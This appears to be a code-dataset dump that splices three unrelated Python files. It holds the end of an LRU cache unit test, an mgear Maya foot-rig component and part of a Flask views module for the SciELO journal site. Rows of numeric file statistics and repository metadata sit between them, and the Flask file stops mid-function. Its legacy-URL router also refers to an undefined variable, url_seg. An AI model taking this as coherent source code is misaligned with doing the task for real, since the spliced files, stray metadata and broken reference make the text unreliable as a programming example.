cache.add('key4', 'value234') # 8 chars, over limit
# We have to remove 2 keys to get back under limit
self.assertEqual(6+8, cache._value_size)
self.assertEqual({'key2':'value2', 'key4':'value234'},
cache.items())
def test_adding_clears_to_after_cleanup_size(self):
cache = lru_cache.LRUSizeCache(max_size=20, after_cleanup_size=10)
cache.add('key1', 'value') # 5 chars
cache.add('key2', 'value2') # 6 chars
cache.add('key3', 'value23') # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache['key2'] # reference key2 so it gets a newer reference time
cache.add('key4', 'value234') # 8 chars, over limit
# We have to remove 3 keys to get back under limit
self.assertEqual(8, cache._value_size)
self.assertEqual({'key4':'value234'}, cache.items())
def test_custom_sizes(self):
def size_of_list(lst):
return sum(len(x) for x in lst)
cache = lru_cache.LRUSizeCache(max_size=20, after_cleanup_size=10,
compute_size=size_of_list)
cache.add('key1', ['val', 'ue']) # 5 chars
cache.add('key2', ['val', 'ue2']) # 6 chars
cache.add('key3', ['val', 'ue23']) # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache['key2'] # reference key2 so it gets a newer reference time
cache.add('key4', ['value', '234']) # 8 chars, over limit
# We have to remove 3 keys to get back under limit
self.assertEqual(8, cache._value_size)
self.assertEqual({'key4':['value', '234']}, cache.items())
def test_cleanup(self):
cache = lru_cache.LRUSizeCache(max_size=20, after_cleanup_size=10)
# Add these in order
cache.add('key1', 'value') # 5 chars
cache.add('key2', 'value2') # 6 chars
cache.add('key3', 'value23') # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache.cleanup()
# Only the most recent fits after cleaning up
self.assertEqual(7, cache._value_size)
def test_keys(self):
cache = lru_cache.LRUSizeCache(max_size=10)
cache[1] = 'a'
cache[2] = 'b'
cache[3] = 'cdef'
self.assertEqual([1, 2, 3], sorted(cache.keys()))
def test_resize_smaller(self):
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=9)
cache[1] = 'abc'
cache[2] = 'def'
cache[3] = 'ghi'
cache[4] = 'jkl'
# Triggers a cleanup
self.assertEqual([2, 3, 4], sorted(cache.keys()))
# Resize should also cleanup again
cache.resize(max_size=6, after_cleanup_size=4)
self.assertEqual([4], sorted(cache.keys()))
# Adding should use the new max size
cache[5] = 'mno'
self.assertEqual([4, 5], sorted(cache.keys()))
cache[6] = 'pqr'
self.assertEqual([6], sorted(cache.keys()))
def test_resize_larger(self):
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=9)
cache[1] = 'abc'
cache[2] = 'def'
cache[3] = 'ghi'
cache[4] = 'jkl'
# Triggers a cleanup
self.assertEqual([2, 3, 4], sorted(cache.keys()))
cache.resize(max_size=15, after_cleanup_size=12)
self.assertEqual([2, 3, 4], sorted(cache.keys()))
cache[5] = 'mno'
cache[6] = 'pqr'
self.assertEqual([2, 3, 4, 5, 6], sorted(cache.keys()))
cache[7] = 'stu'
self.assertEqual([4, 5, 6, 7], sorted(cache.keys()))
| 35.798673
| 79
| 0.603115
| 2,258
| 16,181
| 4.182905
| 0.136847
| 0.138168
| 0.044044
| 0.039598
| 0.574484
| 0.522499
| 0.463632
| 0.44648
| 0.40847
| 0.378295
| 0
| 0.046813
| 0.265991
| 16,181
| 451
| 80
| 35.878049
| 0.748421
| 0.17743
| 0
| 0.522152
| 0
| 0
| 0.040467
| 0
| 0
| 0
| 0
| 0
| 0.310127
| 1
| 0.110759
| false
| 0
| 0.006329
| 0.003165
| 0.126582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714cfc19c240490817e3657df9cb9287844afbb6
| 16,391
|
py
|
Python
|
release/scripts/mgear/shifter_epic_components/EPIC_foot_01/__init__.py
|
lsica-scopely/mgear4
|
28ed5d66370a9516da05d93d447bfc15f4c0c9f4
|
[
"MIT"
] | null | null | null |
release/scripts/mgear/shifter_epic_components/EPIC_foot_01/__init__.py
|
lsica-scopely/mgear4
|
28ed5d66370a9516da05d93d447bfc15f4c0c9f4
|
[
"MIT"
] | null | null | null |
release/scripts/mgear/shifter_epic_components/EPIC_foot_01/__init__.py
|
lsica-scopely/mgear4
|
28ed5d66370a9516da05d93d447bfc15f4c0c9f4
|
[
"MIT"
] | null | null | null |
import pymel.core as pm
import ast
from pymel.core import datatypes
from mgear.shifter import component
from mgear.core import node, applyop, vector
from mgear.core import attribute, transform, primitive
class Component(component.Main):
"""Shifter component Class"""
# =====================================================
# OBJECTS
# =====================================================
def addObjects(self):
"""Add all the objects needed to create the component."""
# joint Description Names
jd_names = ast.literal_eval(
self.settings["jointNamesDescription_custom"]
)
jdn_ball = jd_names[0]
self.up_axis = pm.upAxis(q=True, axis=True)
self.div_count = len(self.guide.apos) - 5
plane = [self.guide.apos[0], self.guide.apos[-4], self.guide.apos[-3]]
self.normal = self.getNormalFromPos(plane)
self.binormal = self.getBiNormalFromPos(plane)
# Heel ---------------------------------------------
# bank pivot
t = transform.getTransformLookingAt(
self.guide.pos["heel"],
self.guide.apos[-4],
self.normal,
"xz",
self.negate,
)
t = transform.setMatrixPosition(t, self.guide.pos["inpivot"])
self.in_npo = primitive.addTransform(
self.root, self.getName("in_npo"), t
)
self.in_piv = primitive.addTransform(
self.in_npo, self.getName("in_piv"), t
)
t = transform.setMatrixPosition(t, self.guide.pos["outpivot"])
self.out_piv = primitive.addTransform(
self.in_piv, self.getName("out_piv"), t
)
# heel
t = transform.getTransformLookingAt(
self.guide.pos["heel"],
self.guide.apos[-4],
self.normal,
"xz",
self.negate,
)
self.heel_loc = primitive.addTransform(
self.out_piv, self.getName("heel_loc"), t
)
attribute.setRotOrder(self.heel_loc, "YZX")
self.heel_ctl = self.addCtl(
self.heel_loc,
"heel_ctl",
t,
self.color_ik,
"sphere",
w=self.size * 0.1,
tp=self.parentCtlTag,
)
attribute.setKeyableAttributes(self.heel_ctl, self.r_params)
# Tip ----------------------------------------------
if self.up_axis == "y":
v = datatypes.Vector(
self.guide.apos[-5].x,
self.guide.pos["heel"].y,
self.guide.apos[-5].z,
)
else:
v = datatypes.Vector(
self.guide.apos[-5].x,
self.guide.apos[-5].y,
self.guide.pos["heel"].z,
)
t = transform.setMatrixPosition(t, v)
self.tip_ctl = self.addCtl(
self.heel_ctl,
"tip_ctl",
t,
self.color_ik,
"circle",
w=self.size,
tp=self.heel_ctl,
)
attribute.setKeyableAttributes(self.tip_ctl, self.r_params)
# Roll ---------------------------------------------
if self.settings["useRollCtl"]:
t = transform.getTransformLookingAt(
self.guide.pos["heel"],
self.guide.apos[-4],
self.normal,
"xz",
self.negate,
)
t = transform.setMatrixPosition(t, self.guide.pos["root"])
self.roll_np = primitive.addTransform(
self.root, self.getName("roll_npo"), t
)
self.roll_ctl = self.addCtl(
self.roll_np,
"roll_ctl",
t,
self.color_ik,
"cylinder",
w=self.size * 0.5,
h=self.size * 0.5,
ro=datatypes.Vector(3.1415 * 0.5, 0, 0),
tp=self.tip_ctl,
)
attribute.setKeyableAttributes(self.roll_ctl, ["rx", "rz"])
# Backward Controlers ------------------------------
bk_pos = self.guide.apos[1:-3]
bk_pos.reverse()
parent = self.tip_ctl
self.bk_ctl = []
self.bk_loc = []
self.previousTag = self.tip_ctl
for i, pos in enumerate(bk_pos):
if i == 0:
t = transform.getTransform(self.heel_ctl)
t = transform.setMatrixPosition(t, pos)
else:
direction = bk_pos[i - 1]
t = transform.getTransformLookingAt(
pos, direction, self.normal, "xz", self.negate
)
bk_loc = primitive.addTransform(
parent, self.getName("bk%s_loc" % i), t
)
bk_ctl = self.addCtl(
bk_loc,
"bk%s_ctl" % i,
t,
self.color_ik,
"sphere",
w=self.size * 0.15,
tp=self.previousTag,
)
attribute.setKeyableAttributes(bk_ctl, self.r_params)
self.previousTag = bk_ctl
self.bk_loc.append(bk_loc)
self.bk_ctl.append(bk_ctl)
parent = bk_ctl
# FK Reference ------------------------------------
self.fk_ref = primitive.addTransformFromPos(
self.bk_ctl[-1], self.getName("fk_ref"), self.guide.apos[0]
)
self.fk_npo = primitive.addTransform(
self.fk_ref,
self.getName("fk0_npo"),
transform.getTransform(self.bk_ctl[-1]),
)
# Forward Controlers ------------------------------
self.fk_ctl = []
self.fk_loc = []
parent = self.fk_npo
self.previousTag = self.tip_ctl
for i, bk_ctl in enumerate(reversed(self.bk_ctl[1:])):
if i == len(self.bk_ctl) - 2:
t = transform.getTransform(self.tip_ctl)
v = transform.getTranslation(bk_ctl)
t = transform.setMatrixPosition(t, v)
else:
t = transform.getTransform(bk_ctl)
dist = vector.getDistance(
self.guide.apos[i + 1], self.guide.apos[i + 2]
)
fk_loc = primitive.addTransform(
parent, self.getName("fk%s_loc" % i), t
)
po_vec = datatypes.Vector(dist * 0.5 * self.n_factor, 0, 0)
fk_ctl = self.addCtl(
fk_loc,
"fk%s_ctl" % i,
t,
self.color_fk,
"cube",
w=dist,
h=self.size * 0.5,
d=self.size * 0.5,
po=po_vec,
tp=self.previousTag,
)
self.previousTag = fk_ctl
attribute.setKeyableAttributes(fk_ctl)
if i:
name = jdn_ball + str(i)
else:
name = jdn_ball
self.jnt_pos.append([fk_ctl, name])
parent = fk_ctl
self.fk_ctl.append(fk_ctl)
self.fk_loc.append(fk_loc)
# =====================================================
# ATTRIBUTES
# =====================================================
def addAttributes(self):
"""Create the anim and setupr rig attributes for the component"""
# Anim -------------------------------------------
# Roll Angles
if not self.settings["useRollCtl"]:
self.roll_att = self.addAnimParam(
"roll", "Roll", "double", 0, -180, 180
)
self.bank_att = self.addAnimParam(
"bank", "Bank", "double", 0, -180, 180
)
self.angles_att = [
self.addAnimParam("angle_%s" % i, "Angle %s" % i, "double", -20)
for i in range(self.div_count)
]
# Setup ------------------------------------------
self.blend_att = self.addSetupParam(
"blend", "Fk/Ik Blend", "double", 1, 0, 1
)
# =====================================================
# OPERATORS
# =====================================================
def addOperators(self):
"""Create operators and set the relations for the component rig
Apply operators, constraints, expressions to the hierarchy.
In order to keep the code clean and easier to debug,
we shouldn't create any new object in this method.
"""
# Visibilities -------------------------------------
try:
# ik
if self.settings["useRollCtl"]:
for shp in self.roll_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
for bk_ctl in self.bk_ctl:
for shp in bk_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
for shp in self.heel_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
for shp in self.tip_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
except RuntimeError:
pm.displayInfo("Visibility already connect")
# Roll / Bank --------------------------------------
if self.settings["useRollCtl"]: # Using the controler
self.roll_att = self.roll_ctl.attr("rz")
self.bank_att = self.roll_ctl.attr("rx")
clamp_node = node.createClampNode(
[self.roll_att, self.bank_att, self.bank_att],
[0, -180, 0],
[180, 0, 180],
)
inAdd_nod = node.createAddNode(
clamp_node.outputB,
pm.getAttr(self.in_piv.attr("rx")) * self.n_factor,
)
pm.connectAttr(clamp_node.outputR, self.heel_loc.attr("rz"))
pm.connectAttr(clamp_node.outputG, self.out_piv.attr("rx"))
pm.connectAttr(inAdd_nod.output, self.in_piv.attr("rx"))
# Reverse Controler offset -------------------------
angle_outputs = node.createAddNodeMulti(self.angles_att)
for i, bk_loc in enumerate(reversed(self.bk_loc)):
if i == 0: # First
inpu = self.roll_att
min_input = self.angles_att[i]
elif i == len(self.angles_att): # Last
sub_nod = node.createSubNode(
self.roll_att, angle_outputs[i - 1]
)
inpu = sub_nod.output
min_input = -360
else: # Others
sub_nod = node.createSubNode(
self.roll_att, angle_outputs[i - 1]
)
inpu = sub_nod.output
min_input = self.angles_att[i]
clamp_node = node.createClampNode(inpu, min_input, 0)
add_node = node.createAddNode(
clamp_node.outputR, bk_loc.getAttr("rz")
)
pm.connectAttr(add_node.output, bk_loc.attr("rz"))
# Reverse compensation -----------------------------
for i, fk_loc in enumerate(self.fk_loc):
bk_ctl = self.bk_ctl[-i - 1]
bk_loc = self.bk_loc[-i - 1]
fk_ctl = self.fk_ctl[i]
# Inverse Rotorder
o_node = applyop.gear_inverseRotorder_op(bk_ctl, fk_ctl)
pm.connectAttr(o_node.output, bk_loc.attr("ro"))
pm.connectAttr(fk_ctl.attr("ro"), fk_loc.attr("ro"))
attribute.lockAttribute(bk_ctl, "ro")
# Compensate the backward rotation
# ik
addx_node = node.createAddNode(
bk_ctl.attr("rx"), bk_loc.attr("rx")
)
addy_node = node.createAddNode(
bk_ctl.attr("ry"), bk_loc.attr("ry")
)
addz_node = node.createAddNode(
bk_ctl.attr("rz"), bk_loc.attr("rz")
)
addz_node = node.createAddNode(
addz_node.output, -bk_loc.getAttr("rz") - fk_loc.getAttr("rz")
)
neg_node = node.createMulNode(
[addx_node.output, addy_node.output, addz_node.output],
[-1, -1, -1],
)
add_node = node.createAddNode(
neg_node.outputY.get() * -1, neg_node.outputY
)
ik_outputs = [neg_node.outputX, add_node.output, neg_node.outputZ]
# fk
fk_outputs = [0, 0, fk_loc.getAttr("rz")]
# blend
blend_node = node.createBlendNode(
ik_outputs, fk_outputs, self.blend_att
)
pm.connectAttr(blend_node.output, fk_loc.attr("rotate"))
return
# =====================================================
# CONNECTOR
# =====================================================
def setRelation(self):
"""Set the relation beetween object from guide to rig"""
self.relatives["root"] = self.fk_ctl[0]
self.relatives["heel"] = self.fk_ctl[0]
self.relatives["inpivot"] = self.fk_ctl[0]
self.relatives["outpivot"] = self.fk_ctl[0]
self.controlRelatives["root"] = self.fk_ctl[0]
self.controlRelatives["heel"] = self.fk_ctl[0]
self.controlRelatives["inpivot"] = self.fk_ctl[0]
self.controlRelatives["outpivot"] = self.fk_ctl[0]
self.jointRelatives["root"] = 0
self.jointRelatives["heel"] = 0
self.jointRelatives["inpivot"] = 0
self.jointRelatives["outpivot"] = 0
for i in range(self.div_count):
self.relatives["%s_loc" % i] = self.fk_ctl[i]
self.jointRelatives["%s_loc" % i] = i
if self.div_count > 0:
self.relatives["%s_loc" % self.div_count] = self.fk_ctl[-1]
self.jointRelatives["%s_loc" % self.div_count] = self.div_count - 1
def addConnection(self):
"""Add more connection definition to the set"""
self.connections["EPIC_leg_01"] = self.connect_leg_2jnt_01
self.connections["leg_2jnt_01"] = self.connect_leg_2jnt_01
self.connections["leg_ms_2jnt_01"] = self.connect_leg_ms_2jnt_01
self.connections["leg_3jnt_01"] = self.connect_leg_3jnt_01
def connect_leg_2jnt_01(self):
"""Connector for leg 2jnt"""
# If the parent component hasn't been generated we skip the connection
if self.parent_comp is None:
return
pm.connectAttr(self.parent_comp.blend_att, self.blend_att)
pm.parent(self.root, self.parent_comp.ik_ctl)
pm.parent(self.parent_comp.ik_ref, self.bk_ctl[-1])
pm.parentConstraint(
self.parent_comp.tws2_rot, self.fk_ref, maintainOffset=True
)
return
def connect_leg_ms_2jnt_01(self):
"""Connector for leg ms 2jnt"""
# If the parent component hasn't been generated we skip the connection
if self.parent_comp is None:
return
pm.connectAttr(self.parent_comp.blend_att, self.blend_att)
pm.parent(self.root, self.parent_comp.ik_ctl)
pm.parent(self.parent_comp.ik_ref, self.bk_ctl[-1])
pm.parentConstraint(
self.parent_comp.tws3_rot, self.fk_ref, maintainOffset=True
)
cns = pm.scaleConstraint(
self.parent_comp.fk_ref,
self.parent_comp.ik_ref,
self.fk_ref,
wal=True,
)
bc_node = pm.createNode("blendColors")
pm.connectAttr(
bc_node.outputB, cns + ".%sW0" % self.parent_comp.fk_ref
)
pm.connectAttr(
bc_node.outputR, cns + ".%sW1" % self.parent_comp.ik_ref
)
pm.connectAttr(self.parent_comp.blend_att, bc_node.blender)
return
def connect_leg_3jnt_01(self):
"""Connector for leg 3jnt"""
# If the parent component hasn't been generated we skip the connection
if self.parent_comp is None:
return
pm.connectAttr(self.parent_comp.blend_att, self.blend_att)
pm.parent(self.root, self.parent_comp.ik_ctl)
pm.parent(self.parent_comp.ik_ref, self.bk_ctl[-1])
pm.parent(self.parent_comp.ik2b_ikCtl_ref, self.bk_ctl[-1])
pm.parentConstraint(
self.parent_comp.tws3_rot, self.fk_ref, maintainOffset=True
)
return
| 33.865702
| 79
| 0.505887
| 1,809
| 16,391
| 4.408513
| 0.156993
| 0.017555
| 0.036865
| 0.010031
| 0.424702
| 0.333041
| 0.244765
| 0.217053
| 0.217053
| 0.2
| 0
| 0.014341
| 0.336343
| 16,391
| 483
| 80
| 33.935818
| 0.71879
| 0.119944
| 0
| 0.272727
| 0
| 0
| 0.042153
| 0.001957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0
| 0.017045
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714e74c6035390e31e82cb8cc61f9783ca761b5f
| 58,939
|
py
|
Python
|
opac/webapp/main/views.py
|
rafaelpezzuto/opac
|
9b54202350e262a27cb9cb756a892185b288df24
|
[
"BSD-2-Clause"
] | null | null | null |
opac/webapp/main/views.py
|
rafaelpezzuto/opac
|
9b54202350e262a27cb9cb756a892185b288df24
|
[
"BSD-2-Clause"
] | null | null | null |
opac/webapp/main/views.py
|
rafaelpezzuto/opac
|
9b54202350e262a27cb9cb756a892185b288df24
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
import logging
import requests
import mimetypes
from io import BytesIO
from urllib.parse import urlparse
from datetime import datetime, timedelta
from collections import OrderedDict
from flask_babelex import gettext as _
from flask import (
render_template,
abort,
current_app,
request,
session,
redirect,
jsonify,
url_for,
Response,
send_from_directory,
g,
make_response,
)
from werkzeug.contrib.atom import AtomFeed
from urllib.parse import urljoin
from legendarium.formatter import descriptive_short_format
from . import main
from webapp import babel
from webapp import cache
from webapp import controllers
from webapp.choices import STUDY_AREAS
from webapp.utils import utils
from webapp.utils.caching import cache_key_with_lang, cache_key_with_lang_with_qs
from webapp import forms
from webapp.config.lang_names import display_original_lang_name
from opac_schema.v1.models import Journal, Issue, Article, Collection
from lxml import etree
from packtools import HTMLGenerator
logger = logging.getLogger(__name__)
JOURNAL_UNPUBLISH = _("O periódico está indisponível por motivo de: ")
ISSUE_UNPUBLISH = _("O número está indisponível por motivo de: ")
ARTICLE_UNPUBLISH = _("O artigo está indisponível por motivo de: ")
IAHX_LANGS = dict(
p='pt',
e='es',
i='en',
)
def url_external(endpoint, **kwargs):
url = url_for(endpoint, **kwargs)
return urljoin(request.url_root, url)
class RetryableError(Exception):
"""Erro recuperável sem que seja necessário modificar o estado dos dados
na parte cliente, e.g., timeouts, erros advindos de particionamento de rede
etc.
"""
class NonRetryableError(Exception):
"""Erro do qual não pode ser recuperado sem modificar o estado dos dados
na parte cliente, e.g., recurso solicitado não exite, URI inválida etc.
"""
def fetch_data(url: str, timeout: float = 2) -> bytes:
try:
response = requests.get(url, timeout=timeout)
except (requests.ConnectionError, requests.Timeout) as exc:
raise RetryableError(exc) from exc
except (requests.InvalidSchema, requests.MissingSchema, requests.InvalidURL) as exc:
raise NonRetryableError(exc) from exc
else:
try:
response.raise_for_status()
except requests.HTTPError as exc:
if 400 <= exc.response.status_code < 500:
raise NonRetryableError(exc) from exc
elif 500 <= exc.response.status_code < 600:
raise RetryableError(exc) from exc
else:
raise
return response.content
@main.before_app_request
def add_collection_to_g():
if not hasattr(g, 'collection'):
try:
collection = controllers.get_current_collection()
setattr(g, 'collection', collection)
except Exception:
# discutir o que fazer aqui
setattr(g, 'collection', {})
@main.after_request
def add_header(response):
response.headers['x-content-type-options'] = 'nosniff'
return response
@main.after_request
def add_language_code(response):
language = session.get('lang', get_locale())
response.set_cookie('language', language)
return response
@main.before_app_request
def add_forms_to_g():
setattr(g, 'email_share', forms.EmailShareForm())
setattr(g, 'email_contact', forms.ContactForm())
setattr(g, 'error', forms.ErrorForm())
@main.before_app_request
def add_scielo_org_config_to_g():
language = session.get('lang', get_locale())
scielo_org_links = {
key: url[language]
for key, url in current_app.config.get('SCIELO_ORG_URIS', {}).items()
}
setattr(g, 'scielo_org', scielo_org_links)
@babel.localeselector
def get_locale():
langs = current_app.config.get('LANGUAGES')
lang_from_headers = request.accept_languages.best_match(list(langs.keys()))
if 'lang' not in list(session.keys()):
session['lang'] = lang_from_headers
if not lang_from_headers and not session['lang']:
# Caso não seja possível detectar o idioma e não tenhamos a chave lang
# no seção, fixamos o idioma padrão.
session['lang'] = current_app.config.get('BABEL_DEFAULT_LOCALE')
return session['lang']
@main.route('/set_locale/<string:lang_code>/')
def set_locale(lang_code):
langs = current_app.config.get('LANGUAGES')
if lang_code not in list(langs.keys()):
abort(400, _('Código de idioma inválido'))
referrer = request.referrer
hash = request.args.get('hash')
if hash:
referrer += "#" + hash
# salvar o lang code na sessão
session['lang'] = lang_code
return redirect(referrer)
def get_lang_from_session():
"""
Tenta retornar o idioma da seção, caso não consiga retorna
BABEL_DEFAULT_LOCALE.
"""
try:
return session['lang']
except KeyError:
return current_app.config.get('BABEL_DEFAULT_LOCALE')
@main.route('/')
@cache.cached(key_prefix=cache_key_with_lang)
def index():
language = session.get('lang', get_locale())
news = controllers.get_latest_news_by_lang(language)
tweets = controllers.get_collection_tweets()
press_releases = controllers.get_press_releases({'language': language})
urls = {
'downloads': '{0}/w/accesses?collection={1}'.format(
current_app.config['METRICS_URL'],
current_app.config['OPAC_COLLECTION']),
'references': '{0}/w/publication/size?collection={1}'.format(
current_app.config['METRICS_URL'],
current_app.config['OPAC_COLLECTION']),
'other': '{0}/?collection={1}'.format(
current_app.config['METRICS_URL'],
current_app.config['OPAC_COLLECTION'])
}
if (
g.collection is not None
and isinstance(g.collection, Collection)
and g.collection.metrics is not None
and current_app.config['USE_HOME_METRICS']
):
g.collection.metrics.total_journal = Journal.objects.filter(
is_public=True, current_status="current"
).count()
g.collection.metrics.total_article = Article.objects.filter(
is_public=True
).count()
context = {
'news': news,
'urls': urls,
'tweets': tweets,
'press_releases': press_releases,
}
return render_template("collection/index.html", **context)
# ##################################Collection###################################
@main.route('/journals/alpha')
@cache.cached(key_prefix=cache_key_with_lang)
def collection_list():
allowed_filters = ["current", "no-current", ""]
query_filter = request.args.get("status", "")
if not query_filter in allowed_filters:
query_filter = ""
journals_list = [
controllers.get_journal_json_data(journal)
for journal in controllers.get_journals(query_filter=query_filter)
]
return render_template("collection/list_journal.html",
**{'journals_list': journals_list, 'query_filter': query_filter})
@main.route("/journals/thematic")
@cache.cached(key_prefix=cache_key_with_lang)
def collection_list_thematic():
allowed_query_filters = ["current", "no-current", ""]
allowed_thematic_filters = ["areas", "wos", "publisher"]
thematic_table = {
"areas": "study_areas",
"wos": "subject_categories",
"publisher": "publisher_name",
}
query_filter = request.args.get("status", "")
title_query = request.args.get("query", "")
thematic_filter = request.args.get("filter", "areas")
if not query_filter in allowed_query_filters:
query_filter = ""
if not thematic_filter in allowed_thematic_filters:
thematic_filter = "areas"
lang = get_lang_from_session()[:2].lower()
objects = controllers.get_journals_grouped_by(
thematic_table[thematic_filter],
title_query,
query_filter=query_filter,
lang=lang,
)
return render_template(
"collection/list_thematic.html",
**{"objects": objects, "query_filter": query_filter, "filter": thematic_filter}
)
@main.route('/journals/feed/')
@cache.cached(key_prefix=cache_key_with_lang)
def collection_list_feed():
language = session.get('lang', get_locale())
collection = controllers.get_current_collection()
title = 'SciELO - %s - %s' % (collection.name, _('Últimos periódicos inseridos na coleção'))
subtitle = _('10 últimos periódicos inseridos na coleção %s' % collection.name)
feed = AtomFeed(title,
subtitle=subtitle,
feed_url=request.url, url=request.url_root)
journals = controllers.get_journals_paginated(
title_query='', page=1, order_by='-created', per_page=10)
if not journals.items:
feed.add('Nenhum periódico encontrado',
url=request.url,
updated=datetime.now())
for journal in journals.items:
issues = controllers.get_issues_by_jid(journal.jid, is_public=True)
last_issue = issues[0] if issues else None
articles = []
if last_issue:
articles = controllers.get_articles_by_iid(last_issue.iid,
is_public=True)
result_dict = OrderedDict()
for article in articles:
section = article.get_section_by_lang(language[:2])
result_dict.setdefault(section, [])
result_dict[section].append(article)
context = {
'journal': journal,
'articles': result_dict,
'language': language,
'last_issue': last_issue
}
feed.add(journal.title,
render_template("collection/list_feed_content.html", **context),
content_type='html',
author=journal.publisher_name,
url=url_external('main.journal_detail', url_seg=journal.url_segment),
updated=journal.updated,
published=journal.created)
return feed.get_response()
@main.route("/about/", methods=['GET'])
@main.route('/about/<string:slug_name>', methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def about_collection(slug_name=None):
language = session.get('lang', get_locale())
context = {}
page = None
if slug_name:
# caso seja uma página
page = controllers.get_page_by_slug_name(slug_name, language)
if not page:
abort(404, _('Página não encontrada'))
context['page'] = page
else:
# caso não seja uma página é uma lista
pages = controllers.get_pages_by_lang(language)
context['pages'] = pages
return render_template("collection/about.html", **context)
# ###################################Journal#####################################
@main.route('/scielo.php/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def router_legacy():
script_php = request.args.get('script', None)
pid = request.args.get('pid', None)
tlng = request.args.get('tlng', None)
allowed_scripts = [
'sci_serial', 'sci_issuetoc', 'sci_arttext', 'sci_abstract', 'sci_issues', 'sci_pdf'
]
if (script_php is not None) and (script_php in allowed_scripts) and not pid:
# se tem pelo menos um param: pid ou script_php
abort(400, _(u'Requsição inválida ao tentar acessar o artigo com pid: %s' % pid))
elif script_php and pid:
if script_php == 'sci_serial':
# pid = issn
journal = controllers.get_journal_by_issn(pid)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
return redirect(url_for('main.journal_detail',
url_seg=journal.url_segment), code=301)
elif script_php == 'sci_issuetoc':
issue = controllers.get_issue_by_pid(pid)
if not issue:
abort(404, _('Número não encontrado'))
if not issue.is_public:
abort(404, ISSUE_UNPUBLISH + _(issue.unpublish_reason))
if not issue.journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(issue.journal.unpublish_reason))
if issue.url_segment and "ahead" in issue.url_segment:
return redirect(
url_for('main.aop_toc', url_seg=url_seg), code=301)
return redirect(
url_for(
"main.issue_toc",
url_seg=issue.journal.url_segment,
url_seg_issue=issue.url_segment),
301
)
elif script_php == 'sci_arttext' or script_php == 'sci_abstract':
article = controllers.get_article_by_pid_v2(pid)
if not article:
abort(404, _('Artigo não encontrado'))
# 'abstract' or None (not False, porque False converterá a string 'False')
part = (script_php == 'sci_abstract' and 'abstract') or None
if tlng not in article.languages:
tlng = article.original_language
return redirect(url_for('main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
part=part,
lang=tlng),
code=301)
elif script_php == 'sci_issues':
journal = controllers.get_journal_by_issn(pid)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
return redirect(url_for('main.issue_grid',
url_seg=journal.url_segment), 301)
elif script_php == 'sci_pdf':
# accesso ao pdf do artigo:
article = controllers.get_article_by_pid_v2(pid)
if not article:
abort(404, _('Artigo não encontrado'))
return redirect(
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
format='pdf',
),
code=301
)
else:
abort(400, _(u'Requsição inválida ao tentar acessar o artigo com pid: %s' % pid))
else:
return redirect('/')
@main.route('/<string:journal_seg>')
@main.route('/journal/<string:journal_seg>')
def journal_detail_legacy_url(journal_seg):
return redirect(url_for('main.journal_detail',
url_seg=journal_seg), code=301)
@main.route('/j/<string:url_seg>/')
@cache.cached(key_prefix=cache_key_with_lang)
def journal_detail(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
utils.fix_journal_last_issue(journal)
# todo: ajustar para que seja só noticias relacionadas ao periódico
language = session.get('lang', get_locale())
news = controllers.get_latest_news_by_lang(language)
# Press releases
press_releases = controllers.get_press_releases({
'journal': journal,
'language': language})
# Lista de seções
# Mantendo sempre o idioma inglês para as seções na página incial do periódico
if journal.last_issue and journal.current_status == "current":
sections = [section for section in journal.last_issue.sections if section.language == 'en']
recent_articles = controllers.get_recent_articles_of_issue(journal.last_issue.iid, is_public=True)
else:
sections = []
recent_articles = []
latest_issue = journal.last_issue
if latest_issue:
latest_issue_legend = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(latest_issue.year), volume=latest_issue.volume, number=latest_issue.number,
suppl=latest_issue.suppl_text, language=language[:2].lower())
else:
latest_issue_legend = ''
journal_metrics = controllers.get_journal_metrics(journal)
context = {
'journal': journal,
'press_releases': press_releases,
'recent_articles': recent_articles,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
# o primiero item da lista é o último número.
# condicional para verificar se issues contém itens
'last_issue': latest_issue,
'latest_issue_legend': latest_issue_legend,
'sections': sections if sections else None,
'news': news,
'journal_metrics': journal_metrics
}
return render_template("journal/detail.html", **context)
@main.route('/journal/<string:url_seg>/feed/')
@cache.cached(key_prefix=cache_key_with_lang)
def journal_feed(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
